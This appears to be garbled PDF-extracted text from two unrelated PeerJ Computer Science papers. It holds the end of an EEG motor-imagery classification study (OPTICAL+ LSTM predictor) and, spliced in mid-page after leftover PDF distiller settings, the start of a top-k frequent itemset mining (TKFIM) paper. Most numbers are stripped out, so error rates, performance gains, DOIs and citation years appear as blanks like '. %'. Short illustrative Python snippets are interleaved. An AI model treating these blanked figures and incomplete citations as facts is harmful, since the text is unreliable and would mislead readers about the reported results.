the data to a new time series with the projected signal having more discrimination between the two mi tasks. this is evident, as fig. 
shows that the features learned from optical+ are more separable, resulting in higher classification accuracy. furthermore, we also performed experiments whereby we optimized the filter parameters followed by the optimization of the lstm network using bayesian optimization. the results for the individual subjects compared with the proposed optical+ predictor is shown in fig. . the error rate for most of the subjects increased compared to the optical+ predictor. the overall performance of the system did not improve as the average error rate increased to . %. this may be mainly due to over-fitting as both the filter parameters and the lstm networks hyper-parameters were optimized consecutively and as such, this approach was not adopted. in future, we will perform further experiments to see if performance improvements can be achieved by simultaneously optimizing both the filter parameters and the lstm hyperparameters. further works will be carried out in future where multiple sub-bands will be tested. also, since convolutional neural network (cnn) has gained a lot of attention over the recent years, we will evaluate the use of cnn for mi-eeg signal classification by developing a hybrid model utilizing cnn with optical+. moreover, cnn works well on image data, therefore, method such as deepinsight (sharma et al., ) can be used to transform the eeg signal to image before being fed as input to the cnn model. to add on, we have employed an lstm network with peephole connections in this work. however, in future we will also consider the lstm network with gated recurrent units, multiplicative lstm (krause et al., ) and lstm networks with attention. all models trained in this work are subject-dependent, which is in agreement with the related works. moreover, we have used ga in this work to demonstrate the significance figure the error rates of optical predictor with optimization of the filter parameters and optical+ predictor. full-size doi: . /peerj-cs. /fig- kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. /fig- http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ of optimizing the filter band parameters. however, any other optimization algorithm can be employed with the proposed optical+ predictor. furthermore, in future, we also intend to test how the proposed method would perform on other eeg signal classification tasks, such as sleep stage classification and seizure classification. moreover, although our proposed approach has outperformed other competing methods on various performance measures, it does have some limitations. one of the limitations of the proposed optical+ predictor is that we have used a population size of with three parameters to be optimized. this results in an average time of about minutes for finding the optimal parameters of the adaptive filter. this means that if any other filter that will require more parameters to be tuned is used, then it will lead to even higher training time. thus, higher computational resources will be required for training. however, we believe this is not a major limitation due to the fact that training can be done offline and the trained model can then be deployed to the preferred device to be used for real-time operation. this is because the time required to process and classify a test signal using the trained model is . ms. 
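returning to the significance test reported above, the paired comparison can be reproduced in a few lines once per-subject error rates are available for two methods. the sketch below is purely illustrative; the arrays are made-up placeholders, not results from this study.

```python
# illustrative: paired t-test on per-subject error rates of two predictors.
# the values below are placeholders, not the results reported in this article.
import numpy as np
from scipy import stats

errors_optical_plus = np.array([0.22, 0.31, 0.18, 0.27, 0.35])   # one entry per subject
errors_optical      = np.array([0.25, 0.33, 0.21, 0.30, 0.36])

t_stat, p_value = stats.ttest_rel(errors_optical_plus, errors_optical)
print(f"t = {t_stat:.3f}, p = {p_value:.4f}")
# a p-value below the chosen significance level indicates that the difference in mean
# error rate between the two predictors is statistically significant.
```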
there is also a possibility that during the process of searching for the optimal filter parameters, the search might get stuck with the local maximum and is not able to find the optimal solution. to alleviate this possibility, higher population size can be used. however, this will again result in higher computational time and a need for higher computational resources. conclusions the proposed method has been able to successfully optimize the filter band parameters that accounts for its improved performance in comparison to the other state-of-the-art methods. optical+ achieved the lowest error rate of . %, which is an improvement of . % compared to the optical predictor and an improvement of . % compared to the conventional wide-band csp approach. on the other hand, optical+ also achieved the highest average sensitivity and specificity of . % and . %, respectively. this shows that our proposed predictor is able to correctly classify more positive and negative samples, which in turn has resulted in the decrease in the error rate. furthermore, optical+ achieved the highest κ value of . , an improvement of . % compared to that of the optical predictor. to add on, the proposed optical+ predictor achieved the lowest error rate for out of the subjects. this shows that apart from performing well in terms of the error rate, specificity, sensitivity and κ value, optical+ is also a robust and reliable predictor. the best performance by other methods in terms of the number of subjects that obtained the lowest error rate was by i-dfbcsp method ( out of subjects). this shows that the proposed predictor is more reliable as it performed well for most of the subjects on a larger dataset consisting of subjects. therefore, optical+ can be used to potentially develop improved hci systems using eeg signals. moreover, it can also be useful for other applications requiring eeg signal classification, such as various sleep stage classification and seizure detection. kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ additional information and declarations funding this research work was supported by the university research committee, fiji national university, fiji. the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: university research committee, fiji national university, fiji. competing interests the authors declare that they have no competing interests. author contributions � shiu kumar conceived and designed the experiments, performed the experiments, analyzed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � ronesh sharma conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. � alok sharma conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. data availability the following information was supplied regarding data availability: data is available at gigascience: cho h; ahn m; ahn s; kwon m; jun sc ( ): supporting data for “eeg datasets for motor imagery brain computer interface” gigascience database. doi . / the database contains matlab files named s'#'.mat and it requires matlab a or a newer, preferably bit operating system. 
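as a practical aside, readers working outside matlab may be able to inspect these .mat files with python. the snippet below is a generic illustration: the file name s01.mat is a hypothetical instance of the s'#'.mat naming scheme, no internal field names are assumed, and files saved in matlab's v7.3 format would instead require an hdf5 reader such as h5py.

```python
from scipy.io import loadmat

# illustrative only: "s01.mat" is a hypothetical example of the s'#'.mat naming scheme
data = loadmat("s01.mat", squeeze_me=True, struct_as_record=False)
print([k for k in data if not k.startswith("__")])   # list the stored variables/fields
# note: loadmat raises NotImplementedError for matlab v7.3 files; use h5py in that case
```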
the source code is available at github: https://github.com/shiukumar/optical_plus. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abibullaev b, zollanvari a. . learning discriminative spatiospectral features of erps for accurate brain-computer interfaces. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . . ang kk, chin zy, zhang h, guan c. . filter bank common spatial pattern (fbcsp) in brain- computer interface. in: ieee international joint conference on neural networks (ieee world congress on computational intelligence). hong kong, – . kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . / https://github.com/shiukumar/optical_plus http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /jbhi. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ blankertz b, sannelli c, halder s, hammer em, kübler a, müller k-r, curio g, dickhaus t. . neurophysiological predictor of smr-based bci performance. neuroimage ( ): – doi . /j.neuroimage. . . . borhani s, kilmarx j, saffo d, ng l, abiri r, zhao x. . optimizing prediction model for a noninvasive brain-computer interface platform using channel selection, classification, and regression. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . . butkevičiūtė e, bikulčienė l, sidekerskienė t, blažauskas t, maskeliūnas r, damaševičius r, wei w. . removal of movement artefact for mobile eeg analysis in sports exercises. ieee access : – doi . /access. . . cheng m, lu z, wang h. . regularized common spatial patterns with subject-to-subject transfer of eeg signals. cognitive neurodynamics ( ): – doi . /s - - -x. cho h, ahn m, ahn s, kwon m, jun sc. . eeg datasets for motor imagery brain-computer interface. gigascience ( ): – doi . /gigascience/gix . chowdhury a, raza h, meena yk, dutta a, prasad g. . an eeg-emg correlation-based brain-computer interface for hand orthosis supported neuro-rehabilitation. journal of neuroscience methods : – doi . /j.jneumeth. . . . damaševičius r, maskeliūnas r, kazanavičius e, woźniak m. . combining cryptography with eeg biometrics. computational intelligence and neuroscience ( ): doi . / / . gao y, gao b, chen q, liu j, zhang y. . deep convolutional neural network-based epileptic electroencephalogram (eeg) signal classification. frontiers in neurology : doi . /fneur. . . gaur p, pachori rb, wang h, prasad g. . a multi-class eeg-based bci classification using multivariate empirical mode decomposition based filtering and riemannian geometry. expert systems with applications : – doi . /j.eswa. . . . ghaemi a, rashedi e, pourrahimi am, kamandar m, rahdari f. . automatic channel selection in eeg signals for classification of left or right hand movement in brain computer interfaces using improved binary gravitation search algorithm. biomedical signal processing and control : – doi . /j.bspc. . . . jiao y, zhang y, chen x, yin e, jin j, wang x, cichocki a. . sparse group representation model for motor imagery eeg classification. ieee journal of biomedical and health informatics ( ): – doi . /jbhi. . . krause b, lu l, murray i, renals s. . multiplicative lstm for sequence modelling. available at https://arxiv.org/abs/ . . kumar s, mamun k, sharma a. . csp-tsm: optimizing the performance of riemannian tangent space mapping using common spatial pattern for mi-bci. 
computers in biology and medicine : – doi . /j.compbiomed. . . . kumar s, sharma a. . a new parameter tuning approach for enhanced motor imagery eeg signal classification. medical & biological engineering & computing ( ): – doi . /s - - - . kumar s, sharma a, tsunoda t. . an improved discriminative filter bank selection approach for motor imagery eeg signal classification using mutual information. bmc bioinformatics (s ): doi . /s - - - . kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /j.neuroimage. . . http://dx.doi.org/ . /jbhi. . http://dx.doi.org/ . /access. . http://dx.doi.org/ . /s - - -x http://dx.doi.org/ . /gigascience/gix http://dx.doi.org/ . /j.jneumeth. . . http://dx.doi.org/ . / / http://dx.doi.org/ . /fneur. . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.bspc. . . http://dx.doi.org/ . /jbhi. . https://arxiv.org/abs/ . http://dx.doi.org/ . /j.compbiomed. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ kumar s, sharma a, tsunoda t. a. brain wave classification using long short-term memory network based optical predictor. scientific reports ( ): doi . /s - - - . kumar s, sharma a, tsunoda t. b. subject-specific-frequency-band for motor imagery eeg signal recognition based on common spatial spectral pattern. in: lecture notes in artificial intelligence: sub-series of lecture notes in computer science. . kumar s, sharma r, sharma a, tsunoda t. . decimation filter with common spatial pattern and fishers discriminant analysis for motor imagery classification. in: international joint conference on neural networks (ijcnn). vancouver, canada, – . li s, feng h. . eeg signal classification method based on feature priority analysis and cnn. in: international conference on communications, information system and computer engineering (cisce). – . li y, pan j, long j, yu t, wang f, yu z, wu w. . multimodal bcis: target detection, multidimensional control, and awareness evaluation in patients with disorder of consciousness. proceedings of the ieee ( ): – doi . /jproc. . . liu j, wu g, luo y, qiu s, yang s, li w, bi y. . eeg-based emotion classification using a deep neural network and sparse autoencoder. frontiers in systems neuroscience : doi . /fnsys. . . luo j, feng z, zhang j, lu n. . dynamic frequency feature selection based approach for classification of motor imageries. computers in biology and medicine : – doi . /j.compbiomed. . . . martisius i, birvinskas d, damasevicius r, jusas v. . eeg dataset reduction and classification using wave atom transform. in: mladenov v, koprinkova-hristova p, palm g, villa aep, appollini b, kasabov n, eds. artificial neural networks and machine learning— icann . berlin: springer, – . mathworks t. . long short-term memory networks. available at https://au.mathworks.com/ help/deeplearning/ug/long-short-term-memory-networks.html (accessed march ). mingai l, shuoda g, jinfu y, yanjun s. . a novel eeg feature extraction method based on oemd and csp algorithm. journal of intelligent & fuzzy systems ( ): – . mullen t, kothe c, chi ym, ojeda a, kerth t, makeig s, cauwenberghs g, jung t. . real-time modeling and d visualization of source dynamics and connectivity using wearable eeg. in: th annual international conference of the ieee engineering in medicine and biology society (embc). piscataway: ieee, – . mumtaz w, ali ssa, yasin mam, malik as. . 
a machine learning framework involving eeg-based functional connectivity to diagnose major depressive disorder (mdd). medical & biological engineering & computing ( ): – doi . /s - - -z. neurostyle. . nbetter stroke rehabilitation system. available at http://neuro-style.com/ nbetter-stroke-rehabilitation-system/ (accessed march ). novi q, cuntai g, dat th, ping x. . sub-band common spatial pattern (sbcsp) for brain-computer interface. in: rd international ieee/embs conference on neural engineering. piscataway: ieee, – . peng g, nourani m, harvey j, dave h. . feature selection using f-statistic values for eeg signal analysis. in: nd annual international conference of the ieee engineering in medicine & biology society (embc). piscataway: ieee, – . poli r, kennedy j, blackwell t. . particle swarm optimization. swarm intelligence ( ): – doi . /s - - - . kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /jproc. . http://dx.doi.org/ . /fnsys. . http://dx.doi.org/ . /j.compbiomed. . . https://au.mathworks.com/help/deeplearning/ug/long-short-term-memory-networks.html https://au.mathworks.com/help/deeplearning/ug/long-short-term-memory-networks.html http://dx.doi.org/ . /s - - -z http://neuro-style.com/nbetter-stroke-rehabilitation-system/ http://neuro-style.com/nbetter-stroke-rehabilitation-system/ http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ radha m, fonseca p, moreau a, ross m, cerny a, anderer p, long x, aarts rm. . sleep stage classification from heart-rate variability using long short-term memory neural networks. scientific reports ( ): doi . /s - - -y. rajasekar p, pushpalatha m. . huffman quantization approach for optimized eeg signal compression with transformation technique. soft computing ( ): – doi . /s - - -z. ramoser h, muller-gerking j, pfurtscheller g. . optimal spatial filtering of single trial eeg during imagined hand movement. ieee transactions on rehabilitation engineering ( ): – doi . / . . sharma a, vans e, shigemizu d, boroevich ka, tsunoda t. . deepinsight: a methodology to transform a non-image data to an image for convolution neural network architecture. scientific reports ( ): doi . /s - - - . thomas kp, cuntai g, lau ct, vinod ap, keng ka. . a new discriminative common spatial pattern method for motor imagery brain computer interfaces. ieee transactions on biomedical engineering ( ): – doi . /tbme. . . türk Ö, Şeker m, akpolat v, Özerdem ms. . classification of mental task eeg records using hjorth parameters. in: th signal processing and communications applications conference (siu). – . utsumi k, takano k, okahara y, komori t, onodera o, kansaku k. . operation of a p -based brain-computer interface in patients with duchenne muscular dystrophy. scientific reports ( ): doi . /s - - - . wang h, zhang y, waytowich nr, krusienski dj, zhou g, jin j, wang x, cichocki a. . discriminative feature extraction via multivariate linear regression for ssvep-based bci. ieee transactions on neural systems and rehabilitation engineering ( ): – doi . /tnsre. . . wang j, feng z, lu n, sun l, luo j. . an information fusion scheme based common spatial pattern method for classification of motor imagery tasks. biomedical signal processing and control : – doi . /j.bspc. . . . wei q, wei z. . binary particle swarm optimization for frequency band selection in motor imagery based brain-computer interfaces. bio-medical materials and engineering (s ):s –s doi . /bme- . 
wodecki j, michalak a, zimroz r. . optimal filter design with progressive genetic algorithm for local damage detection in rolling bearings. mechanical systems and signal processing : – doi . /j.ymssp. . . . wu h, niu y, li f, li y, fu b, shi g, dong m. . a parallel multiscale filter bank convolutional neural networks for motor imagery eeg classification. frontiers in neuroscience : doi . /fnins. . . xing x, wang y, pei w, guo x, liu z, wang f, ming g, zhao h, gui q, chen h. . a high-speed ssvep-based bci using dry eeg electrodes. scientific reports ( ): doi . /s - - - . xu b, song a, zhao g, liu j, xu g, pan l, yang r, li h, cui j. . eeg-modulated robotic rehabilitation system for upper extremity. biotechnology & biotechnological equipment ( ): – doi . / . . . xu z, yang x, sun j, liu p, qin w. . sleep stage classification using time-frequency spectra from consecutive multi-time points. frontiers in neuroscience : doi . /fnins. . . kumar et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /s - - -y http://dx.doi.org/ . /s - - -z http://dx.doi.org/ . / . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tbme. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /tnsre. . http://dx.doi.org/ . /j.bspc. . . http://dx.doi.org/ . /bme- http://dx.doi.org/ . /j.ymssp. . . http://dx.doi.org/ . /fnins. . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / . . http://dx.doi.org/ . /fnins. . http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ yang b, li h, wang q, zhang y. . subject-based feature extraction by using fisher wpd-csp in brain-computer interfaces. computer methods and programs in biomedicine : – doi . /j.cmpb. . . . yang f, zhao x, jiang w, gao p, liu g. . multi-method fusion of cross-subject emotion recognition based on high-dimensional eeg features. frontiers in computational neuroscience : doi . /fncom. . . yin z, liu l, chen j, zhao b, wang y. . locally robust eeg feature selection for individual-independent emotion recognition. expert systems with applications : doi . /j.eswa. . . yuksel a, olmez t. . a neural network-based optimal spatial filter design method for motor imagery classification. plos one ( ):e doi . /journal.pone. . yulita in, rosadi r, purwani s, suryani m. . multi-layer perceptron for sleep stage classification. journal of physics: conference series : doi . / - / / / . zeng h, dai g, kong w, chen f, wang l. . a novel nonlinear dynamic method for stroke rehabilitation effect evaluation using eeg. ieee transactions on neural systems and rehabilitation engineering ( ): – doi . /tnsre. . . zhang y, wang y, jin j, wang x. . sparse bayesian learning for obtaining sparsity of eeg frequency bands based feature vectors in motor imagery classification. international journal of neural systems ( ): doi . /s . zhang y, wang y, zhou g, jin j, wang b, wang x, cichocki a. . multi-kernel extreme learning machine for eeg classification in brain-computer interfaces. expert systems with applications : – doi . /j.eswa. . . . zhang y, zhou g, jin j, wang x, cichocki a. . optimizing spatial patterns with sparse filter bands for motor-imagery based brain-computer interface. journal of neuroscience methods : – doi . /j.jneumeth. . . . zhou d, li x. . epilepsy eeg signal classification algorithm based on improved rbf. frontiers in neuroscience : doi . /fnins. . . zhou m, tian c, cao r, wang b, niu y, hu t, guo h, xiang j. . epileptic seizure detection based on eeg signals and cnn. frontiers in neuroinformatics : doi . /fninf. . . kumar et al. 
) ] /pdfxoutputintentprofileselector /na /preserveediting true /untaggedcmykhandling /leaveuntagged /untaggedrgbhandling /leaveuntagged /usedocumentbleed false >> ] >> setdistillerparams << /hwresolution [ ] /pagesize [ . . ] >> setpagedevice submitted december accepted january published march corresponding author lisu yu, lisuyu@ncu.edu.cn academic editor muhammad asif additional information and declarations can be found on page doi . /peerj-cs. copyright iqbal et al. distributed under creative commons cc-by . open access tkfim: top-k frequent itemset mining technique based on equivalence classes saood iqbal , abdul shahid , muhammad roman , zahid khan , shaha al-otaibi and lisu yu , institute of computing, kohat university of science & technology, kohat, kohat, kpk, pakistan robotics and internet of things lab, prince sultan university, riyadh, saudi arabia information systems department, college of computer and information sciences, princess nourah bint abdulrahman university, riyadh, saudi arabia school of information engineering, nanchang university, jiangxi, china state key laboratory of computer architecture, institute of computing technology, chinese academy of sciences, beijing, china abstract frequently used items mining is a significant subject of data mining studies. in the last ten years, due to innovative development, the quantity of data has grown exponentially. for frequent itemset (fis) mining applications, it imposes new chal- lenges. misconceived information may be found in recent algorithms, including both threshold and size based algorithms. threshold value plays a central role in generating frequent itemsets from the given dataset. selecting a support threshold value is very complicated for those unaware of the dataset’s characteristics. the performance of algorithms for finding fis without the support threshold is, however, deficient due to heavy computation. therefore, we have proposed a method to discover fis without the support threshold, called top-k frequent itemsets mining (tkfim). it uses class equivalence and set-theory concepts for mining fis. the proposed procedure does not miss any fis; thus, accurate frequent patterns are mined. furthermore, the results are compared with state-of-the-art techniques such as top-k miner and build once and mine once (bomo). it is found that the proposed tkfim has outperformed the results of these approaches in terms of execution and performance, achieving . , . , . , and . percent gain on top-k miner using chess, mushroom, and connect and t d k datasets, respectively. similarly, it has achieved a performance gain of . , , . , . percent on bomo using chess, mushroom, connect, and t d k datasets, respectively. therefore, it is argued that the proposed procedure may be adopted on a large dataset for better performance. subjects algorithms and analysis of algorithms, artificial intelligence, data mining and machine learning, data science keywords frequent itemsets, support threshold, algorithm analysis, top-k frequent itemsets, artifical intelligence introduction finding fis is one of the leading research problems used in many critical data mining tasks like classification (nguyen et al., ), clustering (wang et al., ), sequential patterns (fournier-viger et al., ), and association rule mining (arm) (agrawal, imielinski & swami, ). besides this, other various applications such as multitask how to cite this article iqbal s, shahid a, roman m, khan z, al-otaibi s, yu l. . 
fis mining methods find the sets of items that frequently occur together in a given set of transactions; they underlie association rules, which describe how one itemset in a transaction dataset depends on the behavior of another itemset. the first algorithm for computing frequent itemsets and the associations among them is apriori (agrawal, imielinski & swami, ; agrawal & srikant, ). the apriori algorithm generates a large number of candidate itemsets and performs multiple scans of the transaction table to find frequent itemsets, which results in heavy input/output overhead; for large database systems, this overhead also demands large memory for storing the data. later, zaki & gouda ( ) proposed declat, a diffset algorithm that employs a vertical representation of the database. its fundamental idea is that sets of transaction ids (tidsets) can be used to measure the support of itemsets; the main demerit of the related eclat approach is the size of the tidsets, which affects processing time and is costly to store in memory. another algorithm that influenced most of the work in this area is frequent pattern (fp) growth (han, pei & yin, ). the fp-growth method performs at least two scans: the first finds frequent patterns of length one and counts their support, after which the items are sorted in decreasing order of support. these methods are referred to as conventional methods.

the conventional fis methods are based on a minimum support threshold (fournier-viger et al., ; agrawal & srikant, ). in a transaction table the minimum support value, also known as minsup, specifies the minimum frequency an itemset must reach; all itemsets whose frequency is greater than or equal to this threshold are frequent itemsets. however, it is difficult to find a reasonable threshold value. if the threshold is set too low, too many fis are created and the necessary patterns can hardly be found among the massive collection of produced patterns; if it is set too high, too few fis are generated and crucial patterns in the transaction table may be missed. the choice of threshold also affects the search space and the result space (huynh-thi-le et al., ). thus another family of methods has emerged, referred to as top-k procedures: they find the itemsets whose support ranges from the highest down to the k-th highest support among all existing fis, so the user can ask directly for the top-most frequent itemsets. early top-most frequent itemset procedures find the top-most frequent itemsets by repeating the mining process until the desired result is obtained.
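to make the tidset and diffset ideas above concrete, here is a minimal, self-contained python sketch; the toy tidsets are invented for illustration and are not taken from the paper. it shows that the support of an extended itemset can be obtained either by intersecting tidsets, as in eclat, or from a diffset, as declat does.

```python
# toy vertical database: item -> set of transaction ids (tidset); invented data
vertical = {
    "a": {1, 2, 3, 6, 7, 8, 9, 10},
    "b": {1, 2, 4, 5, 6, 7, 8, 9, 10},
    "f": {1, 2, 3, 4, 5, 6, 7, 8, 9, 10},
}

# eclat-style: support of {f, b} is the size of the tidset intersection
tidset_fb = vertical["f"] & vertical["b"]
support_fb_eclat = len(tidset_fb)

# declat-style: diffset(fb) = tids containing f but not b,
# and support(fb) = support(f) - |diffset(fb)|
diffset_fb = vertical["f"] - vertical["b"]
support_fb_declat = len(vertical["f"]) - len(diffset_fb)

assert support_fb_eclat == support_fb_declat  # both give 9 on this toy data
print(support_fb_eclat)
```

the diffset is usually much smaller than the tidset on dense data, which is why declat-style bookkeeping saves memory.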
these approaches generally require more execution time and produce ample result-space, resulting in redundant patterns in the transaction table. n-most is a top-most frequent itemset mining technique that processes the top n impressive results without specifying any user-parameter (fu, kwong & tang, ). it makes use of the apriori candidate creation procedure and test strategy. it first computes the largest itemset and then compares the support of candidate itemsets, recursively. in every iteration, it updates the support threshold of itemsets. the process continues until the user specified bound on the itemset size. the top-most mining technique is the top-k frequent itemsets iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. mining. unlike n-most frequent itemsets mining procedure, top-k finds itemsets of highest support without specifying the itemset size. top-k frequent itemsets mining may be divided into support threshold and without support threshold-based mining algorithms. these algorithms may also be categorized into algorithms based on apriori and fp-growth (agrawal, imielinski & swami, ; han, pei & yin, ). the top-k algorithms (based on apriori) build -itemset and then attach to -itemset and so on. in the end, the results are compared with a user-specified threshold value. top-k algorithms based on fp-growth use fp-tree for pattern mining. it splits the transactions to reduce the search-space. the critical advantage of fp based algorithms is that they use a tree structure of a transaction database. the disadvantage of using a tree is its difficulty in being stored in memory, and its building procedure is costly. han et al. ( ) proposed tfp (top-k frequent closed itemsets mining algorithm), which uses fp-tree without the user’s support threshold. the algorithm constructs the fp-tree based on the primary support threshold starting with zero. it prunes smaller transactions using itemsets length constraints. mining is performed on the final pruned fp-tree. the algorithms discussed above need to scan the transaction table multiple times to build the tree. they also consume large search-space and uses expensive strategies to improve performance. details of these methods are discussed in the related work section. research gap however, summarizing the limitation of the previous studies that are ( ) the absence of user-specified support threshold parameter can affect the performance of the fis mining algorithms, ( ) the generation of the exponential number of itemsets and support counting is difficult to handle in top-k fis mining techniques, and finally, ( ) effectively trimming those transactions that are not useful for the next level, which increases the processing time and degrades performance are the main challenging areas to be handled. to overcome these limitations, we proposed top-k frequent itemsets mining (tkfim) algorithm finding fis without a user-specified support threshold. the working of tkfim is based on concept equivalence classes of set theory. each class is an independent group of itemsets. further, it uses diffset to count the support of the itemsets. the proposed procedure applies to a vertical database structure consisting of transaction ids (tids) followed by items. our algorithm adopts a class-based search strategy to quickly find itemsets of highest support, and it mines the candidates of the current class-based on the joining process. 
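the research gap above turns on how sensitive fis mining is to the support threshold. the contrast between threshold-driven mining and the top-k selection that tkfim targets can be illustrated with a small, hypothetical set of support counts; the counts and the minsup value below are invented for illustration only.

```python
# hypothetical support counts for a handful of candidate itemsets
support = {("f",): 10, ("b",): 9, ("f", "b"): 9, ("a",): 8,
           ("f", "a"): 8, ("d",): 6, ("c",): 4, ("e",): 3}

# threshold-based mining: everything at or above minsup survives;
# the size of the result is hard to predict before choosing minsup
minsup = 5
frequent = {i: s for i, s in support.items() if s >= minsup}

# top-k mining: keep the itemsets whose support is among the k highest
# support values (ties kept), without fixing any threshold in advance
k = 3
kth_support = sorted(set(support.values()), reverse=True)[k - 1]
top_k = {i: s for i, s in support.items() if s >= kth_support}

print(len(frequent), len(top_k))
```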
if the support of an itemset is less than the least support in the top-k list, then the current class terminates the generation of candidate itemsets. the next class joining process is then applied accordingly. the process is repeated until no frequent or candidate itemsets are found. finally, the results of the proposed system are compared with bomo and top-k miner on multiple datasets. the contributions of this paper are listed as follows: . it presents fis based top-k algorithm that reduces the number of scans and decreases the run time. . it finds all frequent fis and ifis, and do not miss any pattern. iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. . this research provides a comprehensive review of the existing literature in the field of frequent itemset mining. . based on the critical analysis, this paper highlights the limitations of the state-of-the-art research studies used for fis mining. . the pruning strategy is used in this paper to reduce the number of candidate frequent itemsets. . afterwards, a novel approach (i.e., tkfim) is proposed, designed, implements based on equivalence classes and diffset theory. . the experimental results show that tkfim has a significant advantage over the existing algorithms. finally, tkfim results are compared with bomo and top-k miner techniques. these algorithms are evaluated on five different datasets, i.e., chess, mushroom, connect, and synthetic dataset. further, the performance gains on each dataset are recorded. in the first experiment, on the chess dataset, the average performance gain of . % and . % was achieved compared to bomo and top-k miner, respectively. similarly, on the mushroom dataset, more than % and . % performance gain was achieved concerning bomo and top-k miner. on the third dataset, i.e., connect . % and . % performance gain was delivered compared to bomo and top-k miner, respectively. in the final experiment on the synthetic dataset (t d k), the average performance gain of . % and . %was recorded for bomo and top-k miner. related work in the area of frequent itemset mining, the very first algorithm, i.e., apriori, was proposed by agrawal, imielinski & swami ( ). this algorithm uses a bottom-up search method to process the extraction of frequent itemsets. it handles all itemsets in k-steps where k represents the size of a given database. in the first step, all the frequent -itemsets are generated. in the second step, all the frequent -itemset are joined to compute -itemsets, compare their support with the given specified minsup. all the frequent -itemsets are processed for the subsequent -itemsets. the process continues until no itemsets can be found. another classical algorithm referred to as eclat was proposed by zaki ( ). the transaction database and minsup are used as the input for this algorithm. it counts the support of itemsets using tids, which is the length of the itemset. eclat algorithm is more efficient than those algorithms which repeatedly scans the database, but it requires more memory to store the tidsets. declat algorithm is a variation of the eclat algorithm implemented using a structure called diffsets (zaki & gouda, ) rather than tidsets. fp-growth is proposed by han, jiawei, and pei, jian in for finding frequent itemsets without candidate generation (han, pei & yin, ). it uses fp-tree for computing frequent itemsets by scanning it at least twice. in the first scan, it processes frequent patterns of length- and counts their support value. 
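as a brief aside before continuing with fp-growth, the level-wise apriori search described above can be written in a few lines of python. this is a simplified illustration over an invented mini-database, not the authors' code, and it omits the candidate-pruning refinements of the original algorithm.

```python
from itertools import combinations

# tiny horizontal database, invented for illustration
transactions = [{"a", "b", "f"}, {"a", "f"}, {"b", "d", "f"}, {"a", "b", "d", "f"}]
minsup = 2

def support(itemset):
    return sum(1 for t in transactions if itemset <= t)

# level 1: frequent 1-itemsets
level = [frozenset([x]) for x in set().union(*transactions)]
level = [c for c in level if support(c) >= minsup]
frequent = list(level)

# level k+1: join frequent k-itemsets, keep the candidates that stay frequent
k = 1
while level:
    candidates = {a | b for a, b in combinations(level, 2) if len(a | b) == k + 1}
    level = [c for c in candidates if support(c) >= minsup]
    frequent.extend(level)
    k += 1

print(sorted(tuple(sorted(i)) for i in frequent))
```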
in the second scan, the items are sorted in decreasing order of their support. it splits the database to build multiple conditional fp-trees, which considerably reduces the search-space. fp-growth works better than apriori because the data in the memory is a tree structure form. all the conventional iqbal et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. algorithms involve an enormous search-space, and it may expand exponentially. the database also needs to be searched regularly, which requires a lot of runtimes. however, since the threshold parameters for these algorithms are required, selecting the threshold value remains a difficult task. if the threshold value remains very high, too many items will be produced. on the other hand, it can lead to too few frequent items when support is too high. top-most fis itemset mining algorithms are proposed to solve this issue of traditional fis mining methods, top-most fis methods top-most fis refers to the user choice of fis in the dataset. user choice allows the user to find top-most fis. top-most early fis procedure finds top-most frequent itemsets by repeating the mining process until the desired result is obtained. the researcher found two significant problems in early top-most fis procedures. first, it takes much more execution time to find the result. secondly, it produces large search-space and result-space. recently, a novel scheme of top-most fis mining called n-most interesting frequent itemsets has been projected (fu, kwong & tang, ). it processes the top-n impressive results without specifying any user parameter. it makes use of the apriori candidate creation procedure and test strategy. it first computes the largest itemset in the dataset. the n-largest itemsets mining compares the support of the candidate itemsets recursively and updates the support threshold at the end of the iteration. the process is iterated and stops at the user-specified bound on the itemset size. the top-most fis mining is divided into two different sets of mining processes, including n-most and top-k itemsets. the details are discussed in the following sections. n-most interesting fis procedures it combines the n-most interesting frequent k-itemsets for every k where <= k <=m and k is the user-supplied maximum size of the itemsets to be mined. this mining process comes from the itemset-iloop and itemset-loop algorithms (fu, kwong & tang, ). the itemset-loop is the first technique proposed in n-most interesting frequent itemsets mining category. its method of candidate creation is similar to the apriori candidate process. itemset-loop algorithm first computes the set of potential -itemset, and then the new potential -itemsets are rooted from -itemsets. in the next iteration, new potential -itemsets are produced from a -itemset. the process is iterated and ends at the user- specified hop on the itemset sized. hence it requires loops back in the kth iteration to generate n-most exciting itemsets. the idea of the itemset-iloop method is similar to that of itemset-loop, except it goes back first to check k - itemsets. the underlying principle for both methods is that if a k-itemset is not frequent, all its subsets are rare. for mining n-most 